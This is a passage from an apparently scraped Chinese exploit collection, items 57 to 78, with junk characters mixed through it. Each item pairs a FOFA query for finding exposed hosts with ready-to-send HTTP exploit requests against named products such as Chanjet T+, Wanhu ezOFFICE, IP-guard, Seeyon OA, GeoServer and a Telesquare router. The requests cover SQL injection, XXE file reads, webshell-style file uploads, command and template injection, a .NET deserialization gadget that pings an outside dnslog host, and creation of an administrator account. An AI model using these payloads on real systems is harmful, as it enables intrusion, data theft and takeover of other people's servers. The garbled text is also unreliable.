c! ?+ M/ a, ?# _( ^7 N; d: R+ CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.361 X5 ^: @- N3 y, U# i; ~8 ?
Content-Type: application/json' [: q3 ^# b j/ w
/ v. ~. A! Q3 P( I3 m
{/ H- ^& n( c) O3 a" U9 r7 | C
"storeID":{
0 R* B) {, M0 Z "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
4 E" `! N- l) x4 o' D" p! G$ S "MethodName":"Start",
, H+ o+ R+ W- X* ]. U, L "ObjectInstance":{
& K2 ^ }+ s9 t7 N9 A "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ Y) J; l+ E$ K$ C "StartInfo": {. \" K* @" T. H) Q" V
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",4 p* J* f3 V) `
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw": \% f! C& W! U
}$ _9 W( ^5 I$ L; ?8 }! d& N8 Q
}
: ?, ~& T+ W6 ~4 @+ M) [+ J7 g/ E% m+ N }0 d7 \8 k" [" L# T _4 B5 P/ j
}& f+ F4 s: j b6 g$ j
( O* D4 v( \+ {2 e f! j$ P; A. ^: e
9 S$ Q0 r$ ]5 y q' g* ]
57. 畅捷通T+ keyEdit.aspx SQL注入, R3 S9 t9 S U! @: R4 W
FOFA:app="畅捷通-TPlus"6 a" y. H% I+ K
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1: r5 \$ M% E r8 s: p9 \, v
Host: host6 D8 C, W& m3 R6 O R, x* ^: @
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.364 p8 ^" ~2 N5 ]0 h5 F# @3 Y2 ~& x
Accept-Charset: utf-8$ y8 h- p5 d/ L: i! V, V9 M( k$ u/ d
Accept-Encoding: gzip, deflate" F* N# r2 A( ^+ B* \
Connection: close
* E; d" O! S' ?5 b/ W: l N
% W' h6 F+ C: r! C4 H& A# n) B8 }, C- o$ \. m0 F% F0 B
58. 畅捷通T+ KeyInfoList.aspx sql注入2 h3 n2 j/ a; x! L- c
FOFA:app="畅捷通-TPlus"
9 n4 D S# i' ^" h+ x8 u5 G' f1 H8 `% AGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.19 @+ j! H. }+ g( E' W7 S
Host: your-ip" N0 Y& j9 c, r+ W6 s+ y
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36; j6 [' {, ]4 c1 d- A' N$ a3 }
Accept-Charset: utf-81 F) X5 ^( n0 C* O% E5 A1 q" g2 E4 D
Accept-Encoding: gzip, deflate" s( T, Z' ^. g' q
Connection: close- d2 n" y, m$ v
: x/ C& `# z# @) Z/ ^% `
0 J' s% E' \0 y
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
. |8 b. r, g- Q3 J! {2 @& S$ v7 tFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
( w! M; k8 ]$ T. i0 oPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
6 v4 F+ A$ X- O* r) oHost: 192.168.86.128:9090/ `, p$ H' a9 ^9 J& Q$ `8 s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.366 Q9 u8 x1 g3 K. r
Connection: close3 z6 @5 G- ^7 P( n2 v: U+ I
Content-Length: 1669
p$ B C" O6 S+ Q) N: ^Accept: */*) J8 ~2 v6 _- J7 z# ]! ~
Accept-Language: en& Q, g( J/ j. x2 z
Content-Type: application/x-www-form-urlencoded
8 W6 M. c; B' t0 w2 `, {Accept-Encoding: gzip9 I5 E) k8 `; ~
6 e$ g6 b: y3 s/ V- ^4 ?9 ]
PAYLOAD+ E; @0 ]9 Q* ~& H2 j
% o0 S. O. p& D; |
$ u$ ` q6 {( D* w0 p# t. p6 I+ D1 L60. 百卓Smart管理平台 importexport.php SQL注入
# ?5 I. h8 ]' j# h/ T) F' \# eFOFA:title="Smart管理平台"
# f+ }" X A$ ]2 V$ c* L/ qGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
, \$ S; C% ]3 Y+ bHost:
: f9 i' Z" Q1 U7 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" H4 h; f8 a/ X# c7 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* P0 E1 d, v" ^, V$ c% _
Accept-Encoding: gzip, deflate
6 j; Z( @/ o. W% d; U5 rAccept-Language: zh-CN,zh;q=0.9, A* W$ |$ C7 _
Connection: close' L1 _6 _/ ~5 A' m+ b
; o' \7 V& P! P3 k/ P
! M6 w& \, l) e L x2 n1 H1 ?
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
' r5 x- c i/ ~2 Y7 lFOFA: title="欢迎使用浙大恩特客户资源管理系统"
& T9 k0 S* g/ c+ X4 v, q. A+ HPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
) U0 S9 H8 [; N7 ]: ZHost: x.x.x.x9 Q/ r5 t3 h8 P5 S& f# _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" ^( j! V! n1 b& [Connection: close- B) k6 J$ b/ k, y- L" g
Content-Length: 27) S& T5 J3 p- ~4 E [+ t
Accept: */*
. `* S: g" H. b- S" d% QAccept-Encoding: gzip, deflate$ d6 X& M1 f" R0 u/ X
Accept-Language: en
0 G5 k( {' u& ` p8 qContent-Type: application/x-www-form-urlencoded
4 D/ t8 X% B& b0 d4 n" c$ P1 w7 l% d4 a% z# ^7 g0 t! V7 i
8uxssX66eqrqtKObcVa0kid98xa
5 r# s8 _+ F1 K8 I1 D* q9 v2 n1 }9 M( J; N6 \
9 X ]1 F5 V2 ]) e62. IP-guard WebServer 远程命令执行
+ ?+ y) {8 |4 uFOFA:"IP-guard" && icon_hash="2030860561"
9 W3 F" W, w8 z3 C2 QGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1, h+ x; y- ?3 h/ a) ^# m0 a
Host: x.x.x.x: J- v' `. _! }: \5 \1 O# p& I. ]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
8 U& q& [0 a# h9 Q0 QConnection: close
5 M. ^7 T0 p3 L7 hAccept: */*
# }+ C1 N% @* N) H8 q6 P6 oAccept-Language: en
) t3 H: d0 t0 E+ P& O) oAccept-Encoding: gzip- U2 j% I) `- |. ^/ `
+ m E' |( e! X% V6 f
- r) W4 ]1 j; A" s6 z1 T* q
访问. `! ]0 e* T5 x. d- o" n) ^
! m. @: y+ t, r1 N2 G# NGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1) F* ]+ k" j* Z
Host: x.x.x.x
9 M* E$ u. W3 M% }3 ]' b& _8 c7 p; X7 `* R
) p5 @0 z1 M# h* l63. IP-guard WebServer任意文件读取
C& A! }2 [8 K% A$ l7 D' RIP-guard < 4.82.0609.0
6 \! R2 b k" F T; vFOFA:icon_hash="2030860561"
5 ^: s2 n4 }' O6 p c1 ~POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
/ R. o% L' z1 x/ }. mHost: your-ip6 b- \7 |$ k4 R5 n; }/ y8 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% b' `+ C$ z4 b, v3 |8 u; B M& h) }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. Q% X1 f% x" ~; A9 i9 A! @! D9 g6 JAccept-Encoding: gzip, deflate
0 p& r7 l# y6 m9 ~; f- k; z; H$ t9 IAccept-Language: zh-CN,zh;q=0.98 b% |% r" A% ~, L! n6 |
Connection: close# m3 x0 D' {+ J( t1 L# l
Content-Type: application/x-www-form-urlencoded( E7 z* o5 s/ M- p9 T2 L
# N, \" D7 `% n( w( R2 o" a* Rpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A/ L8 B/ @2 Q# w6 h
& _" P& |6 `9 a. d
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
+ \4 _3 X: I( F% `8 r* a4 pFOFA:body="/Scripts/EnjoyMsg.js"% F h- q; {$ Z: O1 f
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
5 q ], |7 ^- C# b8 c% l; uHost: 192.168.86.128:9001
4 x$ @7 d' X) s/ |) S. a/ `User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 t' T8 i/ Y1 L# q+ }9 ]& I
Connection: close
. k2 u g4 C4 K$ q: t) n5 nContent-Length: 369
( b. R* i" f6 @* \Accept: */*
?7 ^- @4 I: \8 H+ DAccept-Language: en
+ ? N8 O2 B1 `: d ?6 |4 HContent-Type: text/xml; charset=utf-8
" i3 O4 ~/ [' h% E2 H/ v' GAccept-Encoding: gzip( V) G. R: P" d" u/ B
) `/ y& R4 r& Z0 t' o. J0 P
<?xml version="1.0" encoding="utf-8"?>
, ~( N |- W: z4 Z+ X u* N. P<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">: s: P: \& y- p8 J' Q0 F+ A
<soap:Body>6 x2 ~2 k. A5 E$ n6 G
<GetOSpById xmlns="http://tempuri.org/">
% |- b8 v! [% E; N: L <sId>1';waitfor delay '0:0:5'--+</sId>- }# G+ t$ ^* ]
</GetOSpById>" s" _2 e( a7 K! n, Y8 e0 C
</soap:Body>, r, k. m; b5 G9 E
</soap:Envelope>
# Y3 d" S3 L/ }. n: q3 R$ f5 z+ _1 A1 l9 k
1 u* ~6 |2 K; j3 h$ n0 T
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过, A' O: p4 z% h- f
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"4 D, M! Y' l y( @( r$ ^5 P8 V+ c
响应200即成功创建账号test123456/1234564 R' m; Z+ y3 O/ T7 u
POST /SystemMng.ashx HTTP/1.1
$ p- I8 h( x9 Y$ Z& t# rHost:
6 p. z: D% b/ v1 m. O& d3 T* gUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
9 A! m( B5 k+ P& ]) W0 T' k) ^Accept-Encoding: gzip, deflate
2 i9 i% r" V+ p' v4 A7 ^8 bAccept: */*
/ i! {$ ?; r+ ^% Q" [Connection: close2 [0 O, L) g3 d7 ~' e( M+ [& G
Accept-Language: en
9 m% e4 @2 M6 S0 a' ^ O1 M5 CContent-Length: 174* `* R- g, j; m8 f, C7 H s
2 X$ L( D2 b* _2 ooperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
" f# ~! `, M) d: f. N0 V9 t7 J% Z8 Y
; m- ]3 }# ]8 M; Z
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入' I6 Q3 ~" x5 x% n, V$ s6 T6 _8 \
FOFA:app="万户ezOFFICE协同管理平台" Y7 E& o4 y8 V( {1 L0 \
3 K# Q* y0 @/ H2 |5 T0 K/ ~GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.11 w3 F0 S* O6 w2 Z) W4 y- d
Host: x.x.x.x
) l$ [/ e3 {8 M2 k- |* i/ ?7 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) K. n% y) Y- j1 A1 L/ L
Connection: close6 k. p3 S3 c1 I3 O! ]! O
Accept: */*
6 v+ W2 O, f _* Q& Z& L8 {9 c9 fAccept-Language: en- Y# R2 L% \1 X4 r% [
Accept-Encoding: gzip
! M/ P+ {4 T# s8 ]& v
& u/ D; I/ `/ r `$ a7 B1 f; ]7 C
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
( T. e* [* ?9 |9 F8 Y- m3 J9 t
; f5 [8 \, Q% z$ s- }- D67. 万户ezOFFICE wpsservlet任意文件上传9 C$ L7 c! k' z
FOFA:app="万户网络-ezOFFICE"
7 j i' L& u* \# F% B: a( @) L! r5 YnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型( A1 }4 i& B `7 U8 ]
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1- R5 j3 K* [- U. o8 j& m
Host: x.x.x.x
9 @5 @2 o6 \, yUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0( q9 M8 W( B# s8 j5 O
Content-Length: 173( x+ ]5 o6 v1 @9 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
3 ~5 V+ U0 _- Z% RAccept-Encoding: gzip, deflate
, Q* |% C8 s" j% LAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3. s1 `) y1 p9 M$ h
Connection: close
% t6 Q6 a8 k8 y4 A3 P5 `Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
; W7 c' r$ P" V8 i, EDNT: 1
2 o+ K. N5 I* O1 |Upgrade-Insecure-Requests: 1
. h4 b$ o. m+ b, V) J. Q
2 u, `6 e% G* L5 Y" R; _--ufuadpxathqvxfqnuyuqaozvseiueerp/ }6 L$ F. y2 L$ C5 n( a
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
: E' n( s9 z4 a
U2 ?$ `6 v5 T& g" w; G<% out.print("sasdfghjkj");%>" m1 n, E0 s- X/ [ H% z; I3 o
--ufuadpxathqvxfqnuyuqaozvseiueerp--) m% _3 A( W' e- A2 `
- X5 F' S: l1 e1 A* n; g
1 h: S4 o# w6 D- L5 I
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
- y+ @2 n4 X* `: V! V/ j9 F- p
% |; y# y$ D; u7 L! {0 M/ }68. 万户ezOFFICE wf_printnum.jsp SQL注入
7 e, N& L# f d3 Q+ jFOFA:app="万户ezOFFICE协同管理平台"4 L1 Y' [7 ^8 k2 L! G! z5 e0 S$ D
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
* `+ V/ w' u" F# _* zHost: {{host}}( o. z) s- P$ W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36$ M7 r3 L' i7 J1 R: }8 r
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8) W" o- p6 Q3 I8 U) T
Accept-Encoding: gzip, deflate. h" L6 C' @3 s% o( H! L0 I
Accept-Language: zh-CN,zh;q=0.9# O y+ n' I; p. h" }6 J/ n
Connection: close" m8 m9 q% A; C
4 d4 i0 b* R' r# p0 w1 F1 m$ h6 C! ?! {! I& {9 ]2 }+ ]' [/ y
69. 万户 ezOFFICE contract_gd.jsp SQL注入
4 F1 H1 ^" W; E! }) Y9 HFOFA:app="万户ezOFFICE协同管理平台": _9 E$ z5 q' I$ f1 i
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1% m; T$ q7 w4 X' _3 D, Z& o0 _
Host: your-ip
2 n- L" O2 s( ]User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 e( B; j% f# e% \, L& ^Accept-Encoding: gzip, deflate) _- ?6 j6 B6 b* \5 s" J
Accept: */*
' a6 \ X& W. S% H& l8 x! QConnection: keep-alive
9 D+ X! e! h2 e8 |$ i
7 q% P3 o/ ?' Y# P% p* o0 s) L
# `, ~9 j( Y4 T# H1 y70. 万户ezEIP success 命令执行
8 M: ]- Z& {! V$ CFOFA:app="万户网络-ezEIP"
1 V0 f8 o/ K9 ~$ X- M# BPOST /member/success.aspx HTTP/1.1* L$ G h5 @, g+ W1 B. h
Host: {{Hostname}}9 Q; |% w$ ^+ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
0 M" j2 D5 V* C; zSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=( A/ y q( w2 h5 T
Content-Type: application/x-www-form-urlencoded9 T3 p$ g D. K# @
TYPE: C
& r0 w# ~! C4 Y: y0 |0 D9 LContent-Length: 16702/ ?: C" N8 B/ L1 o. Y" I
6 v" X: ^; e+ p% n" w2 W__VIEWSTATE=PAYLOAD
8 N# K R8 u( u- ~* h8 U! B9 J8 T$ @+ l8 i" @
" T' O, B& x- s$ W D2 T71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
! d) o9 P0 Y' A8 J( pFOFA:body="PM2项目管理系统BS版增强工具.zip"- s+ A6 g* T9 F
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1$ ?6 ?- w6 u1 O) u$ Z+ n
Host: x.x.x.xx.x.x.x
) K2 \9 W u5 x0 ], _: iUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
9 u0 d p9 P9 V3 O+ eConnection: close
! H" _6 k9 b9 e" EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* x" y( z0 w# ^+ N7 Y! ?
Accept-Encoding: gzip, deflate$ p" e0 ?# ^! i n' D9 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# V: Q- p5 o, V/ R* b% d
Upgrade-Insecure-Requests: 1
# D& B# M2 T5 {/ J7 O7 x
+ _! S: M; i- p5 F) A
+ F$ M) T* o% h0 V/ ^72. 致远OA getAjaxDataServlet XXE3 z/ m% q2 ^) K/ l! O
FOFA:app="致远互联-OA"
0 L0 `9 y& G& S3 ]9 v; X* C' L% YPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
3 l \+ `! h4 \8 @3 T% hHost: 192.168.40.131:8099
! X. @1 r: V2 i6 wUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.365 K! d" ^. w5 o- G
Connection: close" ^$ @/ l" Y6 e6 v& y) ^& d
Content-Length: 5835 `% _/ U5 g* w4 h
Content-Type: application/x-www-form-urlencoded' j1 x. E) @! @; G$ A
Accept-Encoding: gzip4 J( e0 q. ^) x% ^0 d
7 W5 e/ d$ H! I
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
; x% a. ?4 f2 N" ~: K
; s/ e6 q9 o; T& S1 w( Q
* n) K* g4 @. J) A73. GeoServer wms远程代码执行- h1 b7 O6 U w& u) @
FOFA:icon_hash=”97540678”: e) _1 S; @7 s5 E# A
POST /geoserver/wms HTTP/1.1% k9 B0 y) q. O7 s! `
Host:
. _" }* I. M6 B o, C+ M5 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
* }4 q+ x' Q& B B2 A4 |9 C- CContent-Length: 1981
$ T4 B5 W. U2 pAccept-Encoding: gzip, deflate1 G' K+ q8 ^: ]4 W* T
Connection: close$ Y! d$ n8 M" ^2 K+ Y5 }
Content-Type: application/xml
. U+ ~) H, X- t" Y! W; J9 bSL-CE-SUID: 3
# C' \$ G0 t2 N0 G, q% ~8 [
) H2 k) E$ P2 d% E0 r$ TPAYLOAD! v0 E4 d4 r! t2 c( W. L
% R2 ~% k* v! [5 n- f
0 U* `4 ]! y$ [- a# T: |( j" O
74. 致远M3-server 6_1sp1 反序列化RCE
8 H$ ]+ V% C g3 kFOFA:title="M3-Server") B6 r0 `' [( z; s
PAYLOAD
' Y2 b9 O! w/ T4 A/ }5 g
& x6 n% g3 Z- I75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
( q4 J! Y- d/ @& Q5 N# SFOFA:app="TELESQUARE-TLR-2005KSH"
5 W# F2 ?3 a( u# @. mGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
6 W& t0 \# \$ m+ q0 EHost: x.x.x.x
( G5 j% D. X/ D3 q2 d7 U# w# h8 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; I6 ^8 g, c+ a
Connection: close
5 V' o: E9 M; z+ ?Accept: */* F: x7 ]4 f1 z
Accept-Language: en
; H2 V( J) q1 yAccept-Encoding: gzip0 Z5 d$ P3 g: P/ O' `
c! {# F4 n$ M4 G; n# X
, W+ D7 X/ ?* KGET /cgi-bin/test28256.txt HTTP/1.1
& C1 q' W" Y5 o7 M$ ~Host: x.x.x.x
! @# E) }. N K7 b: w. b+ _2 V0 l* `$ V D3 `% ]+ r% v
: E- F2 i( R# z v, \+ l
76. 新开普掌上校园服务管理平台service.action远程命令执行/ V& o* f" K/ S1 s, S; u
FOFA:title="掌上校园服务管理平台"" Y8 l1 m7 y! R
POST /service_transport/service.action HTTP/1.1
" Q% Q) d% A L- ^9 y' \7 ?Host: x.x.x.x+ M8 G0 ^) s L# K8 q! z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0# l G7 `* A$ h$ P L6 V
Connection: close
4 x6 @& t9 e3 k- m0 |Content-Length: 211% B1 D/ z+ K5 j' x& l K0 v, g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ w: `+ Y9 y9 d. s/ zAccept-Encoding: gzip, deflate# I; k4 Y: W! r9 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 O2 K& \" V' T. P
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4- ~& p @8 b1 ?: O& @, q
Upgrade-Insecure-Requests: 1
9 x) C o; S3 ^% h) U2 l7 Y7 o" P
( J: |' G5 O, s* a4 l; L: T{1 n9 o: k, L' J% N: e2 m
"command": "GetFZinfo",4 C5 B2 b' J4 X" X. L
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
' U; A. e8 O5 ~8 _/ |3 | ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"5 U7 v7 C' Q: r1 J# z# V
}
* q' G V. m' x0 H+ v7 W. B2 i4 a
' R. d l5 V% i- R2 U
8 P% w; o- z5 i2 ^' k& gGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1( o3 Q3 o P6 v* o
Host: x.x.x.x% T* Z' h h/ a2 A6 X i" w
1 J# Z0 _) r! {5 u4 r( u$ u
b, H8 u# ~3 W! w1 d( i4 P" R
' x% ^( c/ x1 w& u7 g7 h) X) E8 i77. F22服装管理软件系统UploadHandler.ashx任意文件上传
- v- _4 a3 F' ]( d% }' h0 xFOFA:body="F22WEB登陆"
0 x& g" v4 I. LPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
% Z2 I) }# h2 p" |, g. A" @) aHost: x.x.x.x
: @5 m9 v3 O; h7 }5 }0 RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! Y. I' c8 o0 lConnection: close% C; Q9 v2 |+ R5 ]+ u: F5 G0 C: [
Content-Length: 433
5 I5 m4 @, M d, rAccept: */*; y" o% W; @( l- {& X
Accept-Encoding: gzip, deflate4 b8 c4 q) k" r, N& M
Accept-Language: zh-CN,zh;q=0.9
4 d" O& T+ K+ L3 X( @ ~5 l% [* HContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
$ z9 y& ?( Z% k& |, h1 \4 e4 H: e( O& ~6 M4 J5 V0 C; f
------------398jnjVTTlDVXHlE7yYnfwBoix K* d7 k- B1 x- b8 i
Content-Disposition: form-data; name="folder"
$ ?& w, L. ^( {! _7 w4 A5 o2 @6 P7 b8 {8 Y- D5 f9 `" [, ^
/upload/udplog
) ^' x0 c) |7 n------------398jnjVTTlDVXHlE7yYnfwBoix
/ ]+ u. O+ C B' ?9 |Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
0 A' x4 v) a* w9 i* |Content-Type: application/octet-stream
$ A, A( _6 V: b0 t
" v) w9 g9 u4 ehello1234567
0 k6 O3 m, c0 h. M& ~9 f# k------------398jnjVTTlDVXHlE7yYnfwBoix
. r1 `) r- l0 t: F7 gContent-Disposition: form-data; name="Upload"7 y. D Y8 {- f% c; r, A2 E; j
: t2 D( {6 Y6 Q: P& ?, \* MSubmit Query0 x8 y- U6 o6 q5 C# @# d
------------398jnjVTTlDVXHlE7yYnfwBoix--8 b# }5 p9 n( y( I1 L
1 w. v9 I2 N0 m1 Y, l. O& J& M3 Q- N1 Z* V5 u3 h) a
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
9 U' \9 W" f. w& fFOFA:icon_hash="2001627082") Q2 z0 U+ a' d2 v9 N8 b) X
POST /Platform/System/FileUpload.ashx HTTP/1.1
' J* Q1 A( l* ^; N) ]Host: x.x.x.x$ `4 s# u' c8 O. S& S9 F8 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ h8 a+ J2 K/ M
Connection: close
1 T \2 F+ t! ]0 f% v' TContent-Length: 336" ]" k0 m8 K0 l% R1 n
Accept-Encoding: gzip+ J# G0 M9 d8 o1 @8 I& O
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l% K: k9 t4 z& b0 m5 a, H. i3 ^- Y; ?
7 l# [1 Y+ b; m f# y+ e. W( |------YsOxWxSvj1KyZow1PTsh98fdu6l
: x5 {0 j/ a' HContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
7 Q$ {5 J; v5 D- h! {9 rContent-Type: image/png0 R' y+ b% N! R$ ?, Y# H9 V( v
2 L" X# F/ U( \' f& o1 UYsOxWxSvj1KyZow1PTsh98fdu6l- H4 z+ a) q1 M% V3 _; o
------YsOxWxSvj1KyZow1PTsh98fdu6l; p& Z% m; K5 z {. ^
Content-Disposition: form-data; name="target"
